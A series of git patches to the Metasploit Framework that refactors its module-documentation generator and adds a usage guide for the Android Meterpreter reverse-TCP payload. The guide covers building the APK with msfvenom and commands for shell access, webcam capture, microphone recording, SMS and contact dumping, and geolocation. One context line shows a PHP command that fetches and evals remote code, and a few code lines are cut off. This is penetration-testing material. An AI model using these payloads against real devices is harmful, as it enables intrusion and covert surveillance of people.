a/data/markdown_doc/post_demo_template.erb b/data/markdown_doc/post_demo_template.erb index 94fe5685fe..a934269b06 100644 --- a/data/markdown_doc/post_demo_template.erb +++ b/data/markdown_doc/post_demo_template.erb @@ -28,13 +28,13 @@ If you wish to run the post against all sessions from framework, here is how: 1 - Create the following resource script: ``` -<ruby> + framework.sessions.each_pair do |sid, session| run_single("use <%= mod.fullname %>") run_single("set SESSION #{sid}") run_single("run") end -</ruby> + ``` 2 - At the msf prompt, execute the above resource script: diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 635d7fda81..9cc92787e0 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -37,22 +37,22 @@ module Msf # Markdown templates # - CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) - HTML_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'html_template.erb')) - TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) + CSS_BASE_PATH = 'markdown.css' + HTML_TEMPLATE = 'html_template.erb' + TEMPLATE_PATH = 'default_template.erb' # # Demo templates # - REMOTE_EXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'remote_exploit_demo_template.erb')) - BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) - HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) - GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) - LOCALEXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'localexploit_demo_template.erb')) - POST_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'post_demo_template.erb')) - AUXILIARY_SCANNER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) - PAYLOAD_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) + REMOTE_EXPLOIT_DEMO_TEMPLATE = 'remote_exploit_demo_template.erb' + BES_DEMO_TEMPLATE = 'bes_demo_template.erb' + HTTPSERVER_DEMO_TEMPLATE = 'httpserver_demo_template.erb' + GENERIC_DEMO_TEMPLATE = 'generic_demo_template.erb' + LOCALEXPLOIT_DEMO_TEMPLATE = 'localexploit_demo_template.erb' + POST_DEMO_TEMPLATE = 'post_demo_template.erb' + AUXILIARY_SCANNER_DEMO_TEMPLATE = 'auxiliary_scanner_template.erb' + PAYLOAD_DEMO_TEMPLATE = 'payload_demo_template.erb' # Returns the module document in HTML form. @@ -63,10 +63,11 @@ module Msf def get_md_content(items, kb) @md_template ||= lambda { template = '' - File.open(TEMPLATE_PATH, 'rb') { |f| template = f.read } + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', TEMPLATE_PATH)) + File.open(path, 'rb') { |f| template = f.read } return template }.call - md_to_html(ERB.new(@md_template).result(binding()), kb) + md_to_html(ERB.new(@md_template).result(binding()), h(kb)) end @@ -79,7 +80,8 @@ module Msf def load_css @css ||= lambda { data = '' - File.open(CSS_BASE_PATH, 'rb') { |f| data = f.read } + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', CSS_BASE_PATH)) + File.open(path, 'rb') { |f| data = f.read } return data }.call end @@ -94,7 +96,8 @@ module Msf r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true, no_intra_emphasis: true, escape_html: true) ERB.new(@html_template ||= lambda { html_template = '' - File.open(HTML_TEMPLATE, 'rb') { |f| html_template = f.read } + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', HTML_TEMPLATE)) + File.open(path, 'rb') { |f| html_template = f.read } return html_template }.call).result(binding()) end @@ -207,13 +210,14 @@ module Msf end - # Returns a parsed ERB template. + # Returns a parsed demo ERB template. # # @param mod [Msf::Module] Metasploit module. # @param path [String] Template path. # @return [String] - def load_template(mod, path) + def load_demo_template(mod, path) data = '' + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', path)) File.open(path, 'rb') { |f| data = f.read } ERB.new(data).result(binding()) end @@ -244,21 +248,21 @@ module Msf # @return [String] def normalize_demo_output(mod) if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) && mod.shortname != 'browser_autopwn2' - load_template(mod, BES_DEMO_TEMPLATE) + load_demo_template(mod, BES_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) - load_template(mod, HTTPSERVER_DEMO_TEMPLATE) + load_demo_template(mod, HTTPSERVER_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Exploit::Local) - load_template(mod, LOCALEXPLOIT_DEMO_TEMPLATE) + load_demo_template(mod, LOCALEXPLOIT_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Post) - load_template(mod, POST_DEMO_TEMPLATE) + load_demo_template(mod, POST_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Payload) - load_template(mod, PAYLOAD_DEMO_TEMPLATE) + load_demo_template(mod, PAYLOAD_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Auxiliary::Scanner) - load_template(mod, AUXILIARY_SCANNER_DEMO_TEMPLATE) + load_demo_template(mod, AUXILIARY_SCANNER_DEMO_TEMPLATE) elsif is_remote_exploit?(mod) - load_template(mod, REMOTE_EXPLOIT_DEMO_TEMPLATE) + load_demo_template(mod, REMOTE_EXPLOIT_DEMO_TEMPLATE) else - load_template(mod, GENERIC_DEMO_TEMPLATE) + load_demo_template(mod, GENERIC_DEMO_TEMPLATE) end end diff --git a/spec/lib/msf/util/document_generator/normalizer_spec.rb b/spec/lib/msf/util/document_generator/normalizer_spec.rb index 8c8c65394f..8307610e22 100644 --- a/spec/lib/msf/util/document_generator/normalizer_spec.rb +++ b/spec/lib/msf/util/document_generator/normalizer_spec.rb @@ -195,11 +195,11 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do end end - describe 'load_template' do + describe 'load_demo_template' do context 'when a BrowserExploitServer demo template path is given' do it 'returns the demo' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::BES_DEMO_TEMPLATE - expect(subject.send(:load_template, msf_mod, template)).to include('This module is also supported by Browser Autopwn 2') + expect(subject.send(:load_demo_template, msf_mod, template)).to include('This module is also supported by Browser Autopwn 2') end end end @@ -208,42 +208,42 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do context 'when the module is a kind of Msf::Exploit::Remote::HttpServer' do it 'returns the demo of HTTPSERVER_DEMO_TEMPLATE' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::HTTPSERVER_DEMO_TEMPLATE - expect(subject.send(:load_template, msf_mod, template)).to include("use #{mod_fullname}") + expect(subject.send(:load_demo_template, msf_mod, template)).to include("use #{mod_fullname}") end end context 'when the module is a kind of Msf::Exploit::Local' do it 'returns the content of LOCALEXPLOIT_DEMO_TEMPLATE' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::LOCALEXPLOIT_DEMO_TEMPLATE - expect(subject.send(:load_template, msf_mod, template)).to include('To run a local exploit, make sure you are at the msf prompt.') + expect(subject.send(:load_demo_template, msf_mod, template)).to include('To run a local exploit, make sure you are at the msf prompt.') end end context 'when the module is a kind of Msf::Post' do it 'returns the demo of POST_DEMO_TEMPLATE' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::POST_DEMO_TEMPLATE - expect(subject.send(:load_template, msf_mod, template)).to include('There are two ways to execute this post module') + expect(subject.send(:load_demo_template, msf_mod, template)).to include('There are two ways to execute this post module') end end context 'when the module is a kind of Msf::Payload' do it 'returns the demo of PAYLOAD_TEMPLATE' do - template = Msf::Util::DocumentGenerator::DocumentNormalizer::PAYLOAD_TEMPLATE - expect(subject.send(:load_template, msf_mod, template)).to include('> generate') + template = Msf::Util::DocumentGenerator::DocumentNormalizer::PAYLOAD_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('> generate') end end context 'when the module is a kind of Msf::Auxiliary::Scanner' do it 'returns the demo of AUXILIARY_SCANNER_TEMPLATE' do - template = Msf::Util::DocumentGenerator::DocumentNormalizer::AUXILIARY_SCANNER_TEMPLATE - expect(subject.send(:load_template, msf_mod, template)).to include('This module is a scanner module') + template = Msf::Util::DocumentGenerator::DocumentNormalizer::AUXILIARY_SCANNER_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('This module is a scanner module') end end context 'when the module does not have a known kind' do it 'returns the demo of GENERIC_DEMO_TEMPLATE' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::GENERIC_DEMO_TEMPLATE - expect(subject.send(:load_template, msf_mod, template)).to include('msf exploit') + expect(subject.send(:load_demo_template, msf_mod, template)).to include('msf exploit') end end end From b91ee232ff69bcc84d362219aa4eb27c9de42a74 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 8 Mar 2016 10:25:29 -0600 Subject: [PATCH 519/686] Change HTML parsing --- lib/msf/util/document_generator/normalizer.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 9cc92787e0..998120f35b 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -67,7 +67,7 @@ module Msf File.open(path, 'rb') { |f| template = f.read } return template }.call - md_to_html(ERB.new(@md_template).result(binding()), h(kb)) + md_to_html(ERB.new(@md_template).result(binding()), kb.gsub(/ Date: Tue, 8 Mar 2016 11:25:15 -0600 Subject: [PATCH 520/686] Auto
    --- .../modules/auxiliary/scanner/http/tomcat_mgr_login.md | 4 ---- .../modules/auxiliary/scanner/smb/smb_login.md | 6 ------ .../modules/auxiliary/server/browser_autopwn2.md | 10 ---------- .../modules/exploit/multi/script/web_delivery.md | 6 ------ .../modules/exploit/windows/smb/ms08_067_netapi.md | 8 -------- documentation/modules/exploit/windows/smb/psexec.md | 8 -------- .../modules/payload/windows/meterpreter/reverse_tcp.md | 10 ---------- lib/msf/util/document_generator/normalizer.rb | 4 ++++ 8 files changed, 4 insertions(+), 52 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md index 898b505370..b96708835a 100644 --- a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md +++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md @@ -33,16 +33,12 @@ loaded. ## Vulnerable Application ---- - To download the vulnerable application, you can find it here: https://tomcat.apache.org/whichversion.html ## Verification Steps ---- - 1. Do: ```auxiliary/scanner/http/tomcat_mgr_login``` 2. Do: ```set RHOSTS [IP]``` 3. Set TARGETURI if necessary. diff --git a/documentation/modules/auxiliary/scanner/smb/smb_login.md b/documentation/modules/auxiliary/scanner/smb/smb_login.md index 21ec74f4de..e0e9391b68 100644 --- a/documentation/modules/auxiliary/scanner/smb/smb_login.md +++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md @@ -4,14 +4,10 @@ and log into more machines. ## Vulnerable Application ---- - To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1. ## Verification Steps ---- - The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB: ``` @@ -46,8 +42,6 @@ msf auxiliary(smb_login) ## Options ---- - By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will also need to supply user names and passwords. The following options are available to support different credential formats: diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md index 477d87da29..c09b71ff47 100644 --- a/documentation/modules/auxiliary/server/browser_autopwn2.md +++ b/documentation/modules/auxiliary/server/browser_autopwn2.md @@ -3,8 +3,6 @@ feel different for you. Here are the features you should know about before using ## Vulnerable Applications ---- - Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as: * Internet Explorer @@ -16,8 +14,6 @@ Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins ## Exploit URLs ---- - Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL you should send to the targets you wish to attack. @@ -33,8 +29,6 @@ used, including the URLs. ## Browser Autopwn 2 Options ---- - **The HTMLContent Option** The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a @@ -143,8 +137,6 @@ set ExploitReloadTimeout 5000 ## Scenarios ---- - By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to test a specific application, basically all you need to do is setting the @@ -166,8 +158,6 @@ $ ./msfconsole -q -r scripts/resource/bap_flash_only.rc ## Logging ---- - In addition, when a browser connects to BAP, this link-clicking event is also logged to the database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also save the exploit list information so that after testing you can go back to the database and see diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md index b36879b5d9..f5208585ee 100644 --- a/documentation/modules/exploit/multi/script/web_delivery.md +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -11,8 +11,6 @@ say the target supports Powershell. ## Verification Steps ---- - To be able to use web_delivery, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter. @@ -46,8 +44,6 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/ ## Targets ---- - **Python** Python is a fairly popular language, especially on unix-based systems. For example, it comes with @@ -65,8 +61,6 @@ don't come with it by default, but it is still possible to see it installed on a ## Scenarios ---- - **Against a compromised web application** web_delivery would work nicely for a web application with a command execution vulnerability. diff --git a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md index 14c1e4efef..6af5b746ad 100644 --- a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md +++ b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md @@ -9,8 +9,6 @@ vulnerable code path, not just passively. ## Vulnerable Application ---- - This exploit works against a vulnerable SMB service from one of these Windows systems: * Windows 2000 @@ -22,20 +20,14 @@ the system's patch level, or use a vulnerability check. ## Verification Steps ---- - Please see Basic Usage under Overview. ## Options ---- - Please see Required Options under Overview. ## Scenarios ---- - **Failure to detect the language pack** On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index ba096f6330..5fe2abe0c5 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -9,8 +9,6 @@ you normally would with any Metasploit exploits. ## Vulnerable Application ---- - To be able to use exploit/windows/smb/psexec, you must meet these requirements: 1. You have a valid username/password. @@ -20,8 +18,6 @@ To be able to use exploit/windows/smb/psexec, you must meet these requirements: ## Verification Steps ---- - At the minimum, you should be able use psexec to get a session with a valid credential: ``` @@ -50,8 +46,6 @@ meterpreter > ## Options ---- - By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to go. But in reality, you will probably need to at least configure: @@ -65,8 +59,6 @@ This can be either the plain text version, or the Windows hash. ## Scenarios ---- - **Pass the Hash** diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index 49b6fab838..57997dd3c8 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -9,8 +9,6 @@ windows/meterpreter/reverse_tcp is also the default payload for all Windows expl ## Vulnerable Application ---- - This Meterpreter payload is suitable for the following environments: * Windows x64 @@ -18,8 +16,6 @@ This Meterpreter payload is suitable for the following environments: ## Verification Steps ---- - windows/meterpreter/reverse_tcp is typically used in two different ways. First, it is typically used as a payload for an exploit. Here's how to do that: @@ -43,8 +39,6 @@ as an executable: ## Important Basic Commands ---- - **pwd command** The ```pwd``` command allows you to see the current directory you're in on the remote target. @@ -281,8 +275,6 @@ SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b2056 ## Scenarios ---- - **Setting up for Testing** For testing purposes, if you're tired of manually generating a payload and starting a multi handler @@ -683,8 +675,6 @@ To learn more about this, please read this [documentation](https://github.com/ra ## Using the Post Exploitation API in IRB ---- - To enter IRB, at the Meterpreter prompt, do like the following: ``` diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 998120f35b..e5c04d4489 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -24,6 +24,10 @@ module Redcarpet end end + def header(text, header_level) + %Q|#{text}
    | + end + end end end From 860159fa007d7fe697a97f0fd745529b4704c504 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 8 Mar 2016 11:37:25 -0600 Subject: [PATCH 521/686] Update rspec --- .../msf/util/document_generator/normalizer_spec.rb | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/spec/lib/msf/util/document_generator/normalizer_spec.rb b/spec/lib/msf/util/document_generator/normalizer_spec.rb index 8307610e22..c3a539aa8a 100644 --- a/spec/lib/msf/util/document_generator/normalizer_spec.rb +++ b/spec/lib/msf/util/document_generator/normalizer_spec.rb @@ -212,6 +212,13 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do end end + context 'when the module is a remote exploit' do + it 'returns the demo of REMOTE_EXPLOIT_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::REMOTE_EXPLOIT_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('it looks like this is a remote exploit module') + end + end + context 'when the module is a kind of Msf::Exploit::Local' do it 'returns the content of LOCALEXPLOIT_DEMO_TEMPLATE' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::LOCALEXPLOIT_DEMO_TEMPLATE @@ -227,14 +234,14 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do end context 'when the module is a kind of Msf::Payload' do - it 'returns the demo of PAYLOAD_TEMPLATE' do + it 'returns the demo of PAYLOAD_DEMO_TEMPLATE' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::PAYLOAD_DEMO_TEMPLATE expect(subject.send(:load_demo_template, msf_mod, template)).to include('> generate') end end context 'when the module is a kind of Msf::Auxiliary::Scanner' do - it 'returns the demo of AUXILIARY_SCANNER_TEMPLATE' do + it 'returns the demo of AUXILIARY_SCANNER_DEMO_TEMPLATE' do template = Msf::Util::DocumentGenerator::DocumentNormalizer::AUXILIARY_SCANNER_DEMO_TEMPLATE expect(subject.send(:load_demo_template, msf_mod, template)).to include('This module is a scanner module') end From f831d58c1c190c58d898ead508bff26fe687e5a6 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 8 Mar 2016 12:19:27 -0600 Subject: [PATCH 522/686] Support tables --- .../auxiliary/scanner/http/tomcat_mgr_login.md | 2 -- lib/msf/util/document_generator/normalizer.rb | 14 +++++++++++++- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md index b96708835a..f558f37fe7 100644 --- a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md +++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md @@ -13,13 +13,11 @@ Older versions of Tomcat came with default passwords enabled by default. For exa **Tomcat 4** -``` | Username | Password | Role | | -------- | -------- | ------------- | | tomcat | tomcat | tomcat | | role1 | tomcat | role1 | | both | tomcat | tomcat, role1 | -``` **Tomcat 5** diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index e5c04d4489..788204b650 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -28,10 +28,15 @@ module Redcarpet %Q|#{text}
    | end + def table(header, body) + %Q|#{header}#{body}

    | + end + end end end + module Msf module Util module DocumentGenerator @@ -97,7 +102,14 @@ module Msf # @param kb [String] Additional information to add. # @return [String] HTML document. def md_to_html(md, kb) - r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true, no_intra_emphasis: true, escape_html: true) + opts = { + fenced_code_blocks: true, + no_intra_emphasis: true, + escape_html: true, + tables: true + } + + r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, opts) ERB.new(@html_template ||= lambda { html_template = '' path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', HTML_TEMPLATE)) From ad0a948ae771fa2ccb74af084fb4b2dd1f44a7bc Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 8 Mar 2016 12:21:20 -0600 Subject: [PATCH 523/686] Update module_doc_template --- data/markdown_doc/module_doc_template.md | 8 -------- 1 file changed, 8 deletions(-) diff --git a/data/markdown_doc/module_doc_template.md b/data/markdown_doc/module_doc_template.md index ebaafa6e96..aa1e134161 100644 --- a/data/markdown_doc/module_doc_template.md +++ b/data/markdown_doc/module_doc_template.md @@ -4,14 +4,10 @@ But feel free to add more content/sections to this. ## Vulnerable Application ---- - Instructions to get the vulnerable application. ## Verification Steps ---- - Example steps in this format: 1. Install the application @@ -22,16 +18,12 @@ But feel free to add more content/sections to this. ## Options ---- - **Option name** Talk about what it does, and how to use it appropriately. ## Scenarios ---- - Specific demo of using the module that might be useful in a real world scenario. ``` From 12b456e452ab72045b91b9b4e46dc0be762f16b7 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 8 Mar 2016 16:55:04 -0600 Subject: [PATCH 524/686] Add module documentation for android/meterpreter/reverse_tcp --- .../android/meterpreter/reverse_tcp.md | 459 ++++++++++++++++++ 1 file changed, 459 insertions(+) create mode 100644 documentation/modules/payload/android/meterpreter/reverse_tcp.md diff --git a/documentation/modules/payload/android/meterpreter/reverse_tcp.md b/documentation/modules/payload/android/meterpreter/reverse_tcp.md new file mode 100644 index 0000000000..5a5a9f6498 --- /dev/null +++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md @@ -0,0 +1,459 @@ +The android/meterpreter/reverse_tcp payload is a Java-based meterpreter that can be used on an +Android device. It is still at an early stage of development, but there's so many things you can +do with it already. + +The Android Meterpreter allows you to remote control the file system, listen to phone calls, +retrieve or send SMS messages, geo-locate the user, support for post modules, etc. + +## Vulnerable Application + +You can test android/meterpreter/reverse_tcp on these devices: + +**Android Emulator** + +An emulator is the most convenient way to test Android Meterpreter. You can try: + +* [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal. +* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Easier to use than the SDK for managing the emulators. +* [GenyMotion](https://www.genymotion.com/download/) - An account is required. +* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - A collection of pre-configured emulators. + + +**A real Android device** + +Having a real Android device allows you to test features or vulnerabilities you don't necessarily +have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also +get to test it over a real network. + + +## Verification Steps + +Currently, the most common way to use Android Meterpreter is to create it as an APK, and then +execute it. + +To create the APK, here is how with msfconsole: + +``` +msf > use payload/android/meterpreter/reverse_tcp +msf payload(reverse_tcp) > set LHOST 192.168.1.199 +LHOST => 192.168.1.199 +msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk +[*] Writing 8992 bytes to /tmp/android.apk... +msf payload(reverse_tcp) > +``` + +And here is how with msfvenom: + +``` +./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk +``` + +Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, +so please refer to Scenarios for more information. + +## Important Basic Commands + +**pwd** + +The ```pwd``` command allows you to see the current directory you're in. + +``` +meterpreter > pwd +/data/data/com.metasploit.stage +``` + +**cd** + +The ```cd``` command allows you to change directory. Example: + +``` +meterpreter > cd cache +meterpreter > ls +``` + +**cat** + +The ```cat``` command allows you to see the content of a file. + +**ls** + +The ```ls``` command display items in a directory. Example: + +``` +meterpreter > ls +Listing: /data/data/com.metasploit.stage/files +============================================== + +Mode Size Type Last modified Name +---- ---- ---- ------------- ---- +100444/r--r--r-- 0 fil 2016-03-08 14:56:08 -0600 rList-com.metasploit.stage.MainActivity +``` + +**upload** + +The ```upload``` command allows you to upload a file to the remote target. The ```-r``` option +allows you to do so recursively. + +**download** + +The ```download``` command allows you to download a file from the remote target. The ```-r``` +option allows you to do so recursively. + +**search** + +THe ```search``` command allows you to find files on the remote target. For example: + +``` +meterpreter > search -d . -f *.txt +``` + +**ifconfig** + +The ```ifconfig``` command displays the network interfaces on the remote machine. + +``` +meterpreter > ifconfig + +... + +Interface 10 +============ +Name : wlan0 - wlan0 +Hardware MAC : 60:f1:89:07:c2:7e +IPv4 Address : 192.168.1.207 +IPv4 Netmask : 255.255.255.0 +IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e +IPv6 Netmask : :: +IPv6 Address : fe80::62f1:89ff:fe07:c27e +IPv6 Netmask : :: +IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954 +IPv6 Netmask : :: + +... +``` + +**getuid** + +The ```getuid``` command shows you the current user that the payload is running as: + +``` +meterpreter > getuid +Server username: u0_a231 +``` + +**ps** + +The ```ps``` command shows you a list of processes the Android device is running. For example: + +``` +meterpreter > ps + +Process List +============ + + PID Name Arch User + --- ---- ---- ---- + 1 /init root + 2 kthreadd root + 3 ksoftirqd/0 root + 7 migration/0 root + 8 rcu_preempt root + 9 rcu_bh root + 10 rcu_sched root + 11 watchdog/0 root + 12 watchdog/1 root + 13 migration/1 root + 14 ksoftirqd/1 root + 17 watchdog/2 root + 18 migration/2 root + 19 ksoftirqd/2 root + 22 watchdog/3 root + 23 migration/3 root + +... +``` + +**shell** + +The ```shell``` command allows you to interact with a shell: + +``` +meterpreter > shell +Process 1 created. +Channel 1 created. +id +uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0 +``` + +To get back to the Meterpreter prompt, you can do: [CTRL]+[Z] + +**sysinfo** + +The ```sysinfo``` command shows you basic information about the Android device. + +``` +meterpreter > sysinfo +Computer : localhost +OS : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64) +Meterpreter : java/android +``` + +**webcam_list** + +The ```webcam_list``` command shows a list of webcams you could use for the ```webcam_snap``` +command. Example: + +``` +meterpreter > webcam_list +1: Back Camera +2: Front Camera +``` + +**webcam_snap** + +The ```webcam_snap``` command takes a picture from the device. You will have to use the +```webcam_list``` command to figure out which camera to use. Example: + +``` +meterpreter > webcam_snap -i 2 +[*] Starting... +[+] Got frame +[*] Stopped +Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg +``` + +**record_mic** + +The ```record_mic``` command records audio. Good for listening to a phone conversation, as well as +other uses. Example: + +``` +meterpreter > record_mic -d 20 +[*] Starting... +[*] Stopped +Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav +``` + +**activity_start** + +The ```activity_start``` command is an execute command by starting an Android activity from a URI +string. + +**check_root** + +The ```check_root``` command detects whether your payload is running as root or not. Example: + +``` +meterpreter > check_root +[*] Device is not rooted +``` + +**dump_calllog** + +The ```dump_calllog``` command retrieves the call log from the Android device. + +**dump_contacts** + +``` +meterpreter > dump_contacts +[*] Fetching 5 contacts into list +[*] Contacts list saved to: contacts_dump_20160308155744.txt +``` + +**geolocate** + +The ```geolocate``` commands allows you to locate the phone by retrieving the current lat-long +using geolocation. + +**wlan_geolocate** + +The ```wlan_geolocation``` command allows you to locate the phone by retrieving the current +lat-long using WLAN information. Example: + +``` +meterpreter > wlan_geolocate +[*] Google indicates the device is within 150 meters of 30.*******,-97.*******. +[*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.******* +``` + +**send_sms** + +The ```send_sms``` command allows you to send an SMS message. Keep in mind the phone will keep a +copy of it, too. + +``` +meterpreter > send_sms -d "2674554859" -t "hello" +[+] SMS sent - Transmission successful +``` + +**sms_dump** + +The ```sms_dump``` command allows you to retrieve SMS messages. And save them as a text file. +For example: + +``` +meterpreter > dump_sms +[*] Fetching 4 sms messages +[*] SMS messages saved to: sms_dump_20160308163212.txt + +... + +$ cat sms_dump_20160308163212.txt + +===================== +[+] SMS messages dump +===================== + +Date: 2016-03-08 15:30:12 -0600 +OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64) +Remote IP: 192.168.1.207 +Remote Port: 59130 + +#1 +Type : Incoming +Date : 2016-03-08 15:29:32 +Address : ********** +Status : NOT_RECEIVED +Message : Hello world + +... + +``` + +**run** + +The ```run``` command allows you to run a post module against the remote machine at the Meterpreter +prompt. For example: + +``` +meterpreter > run post/android/capture/screen +``` + +## Scenarios + +**Uploading APK to an Emulator using install_msf_apk.sh** + +The Metasploit Framework comes with a script that allows you to automatically upload your APK to +an active emulator, and execute it. It requires the [Android SDK platform-tools](http://developer.android.com/sdk/installing/index.html) to run, as well as [Java](https://java.com/en/download/). + +To use this, follow these steps: + +1. Start the Android Emulator +2. Generate the Android payload as an APK. 